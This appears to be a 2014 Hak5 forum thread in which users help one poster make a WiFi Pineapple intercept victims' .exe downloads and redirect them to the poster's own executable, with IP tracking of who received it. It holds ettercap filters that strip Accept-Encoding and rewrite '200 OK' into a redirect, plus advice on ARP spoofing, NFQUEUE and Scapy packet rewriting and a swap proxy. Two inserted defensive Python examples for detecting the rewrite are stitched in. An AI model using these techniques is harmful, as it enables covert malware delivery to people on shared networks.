DarkPringles Posted September 16, 2014

Hi Hak5 community, I have a few problems implementing a feature on the WiFi Pineapple and hope somebody can help me. My goal is to run a script that replaces every requested *.exe file with a link of my own. Scenario: a user tries to download, for example, VLC Media Player from the official site (http://get.videolan.org/vlc/2.1.5/win32/vlc-2.1.5-win32.exe) over the WiFi Pineapple. The Pineapple intercepts this request and replaces it with a custom *.exe link so that the user downloads and executes my custom executable. Ideally I want to implement a tiny text file that saves the IP address of each user who got the replaced exe, so that if he tries to redownload his file he will not get spoofed again. But first the replacement. I want to implement a custom ettercap filter that I found on the internet. But every time I use ettercap for unified sniffing, the internet connection of all clients connected to the Pineapple aborts. The only way to get ettercap working is to set the "-u" parameter. This option prevents ettercap from disabling IP forwarding in the kernel. But with this parameter the use of filters that replace data in real time is prohibited. So the final question is how to run ettercap with custom filters, or is there any alternative solution for my problem?
I hope anyone can help me =) Best regards, DarkPringles, from Germany

Source of the filter (I will customize that later):

    # replace rmccurdy with your website
    # replace the url with whatever exe you like
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Accept-Rubbish!");
            # note: replacement string is same length as original string
            msg("zapped Accept-Encoding!\n");
        }
    }
    if (ip.proto == TCP && tcp.src == 80) {
        replace("keep-alive", "close");
        replace("Keep-Alive", "close");
    }
    if (ip.proto == TCP && search(DATA.data, ": application")) {
        # enable for logging
        log(DECODED.data, "/tmp/log.log");
        msg("found EXE\n");
        # "Win32" is the first part of the exe example:
        # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc ..
        if (search(DATA.data, "Win32")) {
            msg("doing nothing\n");
        } else {
            replace("200 OK", "301 Moved Permanently\nLocation: <snip>\n");
            msg("redirect success\n");
        }
    }
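Added example for the thread (not the filter author's code and not from the Pineapple project): a small Python checker a defender can run over request and response header blocks taken from a proxy log or packet capture, to spot the marks the filter above leaves on the wire. It looks for the mangled Accept-Encoding header name (both spellings used in this thread) and for a 3xx reply whose Location moves an .exe download to a different host while the binary Content-Type of the original 200 reply is still present. The sample messages and the host replacement.invalid are constructed for the example.

```python
"""Flag fingerprints that an in-path HTTP rewrite leaves in captured traffic.

Added example for defenders; not code from this thread. Samples are constructed.
"""
from typing import Dict, List, Tuple
from urllib.parse import urlsplit

# Header names produced when a rewrite blanks Accept-Encoding so the server
# answers uncompressed. Both spellings come from the filters in this thread.
MANGLED_ACCEPT_ENCODING = {"accept-rubbish!", "azzept-encoding"}


def parse_message(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP message into start line, lower-cased header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect_request(raw: bytes) -> List[str]:
    """Client -> server direction: look for a rewritten Accept-Encoding header."""
    _, headers, _ = parse_message(raw)
    return [
        f"request: Accept-Encoding rewritten to '{name}' (compression disabled in path)"
        for name in headers
        if name in MANGLED_ACCEPT_ENCODING
    ]


def inspect_response(raw: bytes, requested_url: str) -> List[str]:
    """Server -> client direction: look for an overwritten status line and a
    redirect that sends an .exe download to a host other than the one asked for."""
    start, headers, _ = parse_message(raw)
    findings: List[str] = []
    parts = start.split(" ", 2)
    status = parts[1] if len(parts) > 1 else ""
    location = headers.get("location", "")
    if status.startswith("3") and location:
        target = urlsplit(location)
        if target.path.lower().endswith(".exe") and target.hostname != urlsplit(requested_url).hostname:
            findings.append(f"response: .exe download redirected to another host: {location}")
        # A genuine redirect has no binary payload; a status line swapped in over a
        # "200 OK" keeps the original Content-Type and Content-Length headers.
        if headers.get("content-type", "").lower().startswith("application/"):
            findings.append("response: redirect still carries the binary Content-Type of the original 200 reply")
    return findings


# Constructed samples: the request a client sends and the reply it would see
# after the rewrite. replacement.invalid is a placeholder host name.
SAMPLE_REQUEST = (b"GET /vlc/2.1.5/win32/vlc-2.1.5-win32.exe HTTP/1.1\r\n"
                  b"Host: get.videolan.org\r\n"
                  b"Azzept-encoding: gzip, deflate\r\n\r\n")
SAMPLE_RESPONSE = (b"HTTP/1.1 301 Moved Permanently\r\n"
                   b"Location: http://replacement.invalid/setup.exe\r\n"
                   b"Content-Type: application/octet-stream\r\n"
                   b"Content-Length: 12\r\n"
                   b"Connection: close\r\n\r\n"
                   b"MZ\x90\x00")
REQUESTED_URL = "http://get.videolan.org/vlc/2.1.5/win32/vlc-2.1.5-win32.exe"

if __name__ == "__main__":
    for finding in inspect_request(SAMPLE_REQUEST) + inspect_response(SAMPLE_RESPONSE, REQUESTED_URL):
        print(finding)
```

Run against a capture, the two functions are called once per request and once per matching response; an unmodified request with a normal Accept-Encoding header and a same-host redirect without a binary Content-Type produce no findings.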
Sebkinne Posted September 16, 2014

We have something like this coming, specifically replacing files such as .exe on the go. It is currently written in Python, but we have noticed that when lots of clients are browsing, proxying files such as images becomes heavy for the WiFi Pineapple. Writing the same program in C++ has given much better results, so we will see where it takes us. Best Regards, Sebkinne
DarkPringles (Author) Posted September 16, 2014

Wow, thanks for the quick reply. So I will wait for this cool feature. Can you say why all clients get no internet connection while ettercap runs without the "-u" parameter? PS: can you remove the custom link in the ettercap filter source in my post?
DarkPringles (Author) Posted September 16, 2014

thx =)
Sebkinne Posted September 16, 2014

> Wow, thanks for the quick reply. So I will wait for this cool feature. Can you say why all clients get no internet connection while ettercap runs without the "-u" parameter? PS: can you remove the custom link in the ettercap filter source in my post?

Unfortunately I can't; ettercap is a bit buggy. Let's see whether we can perhaps get hold of a newer version. Best Regards, Sebkinne
DarkPringles (Author) Posted September 16, 2014

Fantastic. Thanks for the quick reply. Great project. Saves a pentester a lot of time and nerves. Best regards
i8igmac Posted September 17, 2014

http://pastebin.com/n7AHi5Ny It is a subject that needs more work; you need a payload to cover all situations... I have spent some long hours working on this subject and could provide help.
DarkPringles (Author) Posted September 17, 2014

Very cool script. I will try it in my environment!
DarkPringles (Author) Posted September 17, 2014

Not easy to get this working on the WiFi Pineapple ... but in a full Linux environment this is fully working. Thanks for sharing... awesome work.
t31m0 Posted September 17, 2014

Good idea xDDD ... I'll be waiting xDDDDD
whitenoise Posted September 17, 2014

You can do something like this with Deep Packet Inspection. It is also possible to do it in Python. Add a new chain to your iptables which directs forwarded TCP packets to NFQUEUE. You can grab the packets with a Python script and decide what to do with them (let them pass, alter them or drop them). What you could do is let the GET request pass to the server and then collect all the segments coming from the server to reassemble the HTML source code (basically sending a lot of ACKs). In many cases the content of the segments is compressed, so you have to piece it all together and then decompress it. In a next step you can alter the HTML as you like (replace hyperlinks etc.). Then you have to simulate the server connection to the client and transmit the altered HTML in segments back to the client (you can use Scapy for that).
daniboy92 Posted September 17, 2014

I'll be waiting too!
i8igmac Posted September 17, 2014

A 100% reliable proxy written in the language of your choice for the basic framework, which supports HTTPS as well; then each exploit could be a plugin. If the GET request includes('*.exe'), then launch basic-plugin.rb for the swapping function that meets these if statements... mod the content length and swap the data. Plugins could be in the language of your choice; simply handle the specific request and provide a response designed for that exploit.
DarkPringles (Author) Posted September 17, 2014

> Unfortunately I can't; ettercap is a bit buggy. Let's see whether we can perhaps get hold of a newer version. Best Regards, Sebkinne

Just found it out. Ettercap disables IP forwarding in the kernel before it starts sniffing. I just enabled it again ("echo 1 > /proc/sys/net/ipv4/ip_forward") after starting ettercap. After doing that, clients get an internet connection and you are able to manipulate the traffic with custom ettercap filters.... But manipulating the traffic with ettercap and custom filters is still not possible for me. Ettercap told me that it found a string and replaced it, but without impact in the client's web browser -.-

Source of filter:

    if (ip.proto == TCP) {
        if (search(DATA.data, "Software")) {
            replace("Software", "Hardware");
            msg("String Replaced \n");
        }
    }
i8igmac Posted September 18, 2014

Your ettercap config may need iptables enabled... idk, maybe you have already done this. Also you need to see plain text: replace accept-encoding with Azzept-encoding. Idk, maybe you left that part out of your post.
DarkPringles (Author) Posted September 18, 2014

> Your ettercap config may need iptables enabled... idk, maybe you have already done this. Also you need to see plain text: replace accept-encoding with Azzept-encoding. Idk, maybe you left that part out of your post.

Thanks for the help. I forgot to replace the encoding part .... -.- My filter is now in this state, but no result at the client side =(

    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
            replace("Accept-Encoding", "Azzept-encoding");
            msg("Enc Skippd \n");
        }
    }
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "software")) {
            replace("software", "hardware");
            msg("Software Replaced \n");
        }
    }
i8igmac Posted September 18, 2014

When ettercap starts up, does it say it set the UID? And did you enable iptables in etter.conf? Also test your browser at a site that does not use HTTPS: MSN, Yahoo, etc.
DarkPringles (Author) Posted September 18, 2014

The message is: "Privileges dropped to UID 0 GID 0..." ... iptables is also enabled. I used the same configuration on my Kali box with the same results... ettercap found the string but the replacement is still without impact. I use non-SSL sites to test it. So it has to be a trivial error, because it does not work on Kali or the Pineapple.

To sum up:
- UID changed to 0
- iptables uncommented in etter.conf
- the custom filter is like in the post before
- command in Kali: "ettercap -Tq -i wlan0 -F custom-filter"
- command on the Pineapple: "ettercap -Tq -i br-lan -F custom-filter"

Any ideas? Thanks for your time!
i8igmac Posted September 18, 2014

http://l33ttutorials.wordpress.com/2014/02/20/tutorial-man-in-the-middle-attack-using-sslstrip-and-arpspoofing-with-kali-linux/ Read this; VM installs or HD installs of Kali may cause issues, I guess.

Edit: It's just ettercap's ugly ways lol, one day it works, another day you're like wtf... this frustration is why I wrote a proxy to do the data swap. I'm sure it's a small step you are missing... Arpspoof, Dnsspoof and a proxy kung fu replaces ettercap... Ettercap -T -q -f filter -M ARP // It's been a few years since I used ettercap.
johnjdoe Posted September 18, 2014

> Unfortunately I can't; ettercap is a bit buggy. Let's see whether we can perhaps get hold of a newer version. Best Regards, Sebkinne

It's off topic, but it's pretty cool to read that Sebkinne can speak German!
Sebkinne Posted September 18, 2014

> It's off topic, but it's pretty cool to read that Sebkinne can speak German!

Can speak it? I am one!
johnjdoe Posted September 18, 2014

> Can speak it? I am one!

Great, so not just "can speak it" but actually "am one"! Glad to hear it!
whitenoise Posted September 18, 2014

When ettercap swaps strings, does it also correct the packet length? If not, that can cause the packet to be discarded at the other end because of an error. If you modify packets you have to recompute not only the length but also the checksum! :P

// Does ettercap recalculate the length of the packet (and the checksum)? This might be a problem because wrong packets might be dropped by the client.
Sebkinne Posted September 18, 2014

In my proxy, I make sure that the length is recalculated on injection. In regards to ettercap, I genuinely do not know; I haven't got too much experience, but I would expect it does. I'll take a look at the source this weekend. I am expecting to launch my proxy by the end of the month / start of next month. Best, Sebkinne
i8igmac Posted September 18, 2014

From my experience, I remember swapping data with ettercap: if the string size was larger than the original, then the client's browser would not always receive the correct amount of data. For example the page source may be missing the end, </HTML>. With replace(12345, 1234567) the page may be missing "L>", i.e. it ends in </HTM.
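To show the effect i8igmac describes, and how the receiving side catches it, here is an added Python example (not from this thread and not ettercap's or the proxy's code): a replacement string two bytes longer than the original, with the announced Content-Length left unchanged, leaves a client that reads exactly the announced number of bytes with a page cut short by exactly those two bytes. A check of received length against the announced length, plus a comparison with a known-good SHA-256 (as vendors publish for installers), flags both that case and an equal-length swap that the length check alone cannot see. The page bytes and the reference hash are constructed stand-ins.

```python
"""Why a length-changing string swap truncates the page, and how to detect it.

Added example; not code from this thread. Page bytes and reference hash are
constructed stand-ins for a real response and a vendor-published checksum.
"""
import hashlib
from typing import Dict, Optional

# Constructed page; the server announces its exact length in Content-Length.
ORIGINAL_PAGE = b"<html><body>Software 12345</body></html>"
DECLARED_LENGTH = len(ORIGINAL_PAGE)
# Stand-in for a hash obtained out of band (not from the same connection).
REFERENCE_SHA256 = hashlib.sha256(ORIGINAL_PAGE).hexdigest()


def client_view_after_rewrite(original: bytes, old: bytes, new: bytes, declared: int) -> bytes:
    """Bytes a client keeps when an in-path filter swaps old -> new but leaves
    the framing alone: the client stops after `declared` bytes, so a longer
    replacement pushes the tail of the page past the cut-off."""
    rewritten = original.replace(old, new)
    return rewritten[:declared]


def verify_download(body: bytes, declared: Optional[int], reference_sha256: str) -> Dict[str, object]:
    """Compare what was received with the announced length and a known-good hash."""
    digest = hashlib.sha256(body).hexdigest()
    return {
        "bytes_received": len(body),
        "length_ok": declared is None or declared == len(body),
        "hash_ok": digest == reference_sha256,
        "sha256": digest,
    }


if __name__ == "__main__":
    seen = client_view_after_rewrite(ORIGINAL_PAGE, b"12345", b"1234567", DECLARED_LENGTH)
    print(seen)  # the closing </html> has lost its last two bytes
    print(verify_download(seen, DECLARED_LENGTH, REFERENCE_SHA256))
```

The length check passes for the truncated page because the client received exactly the announced number of bytes; only the hash comparison reveals that the content is not what the server sent, which is why a checksum published out of band is the check worth making before running a downloaded installer.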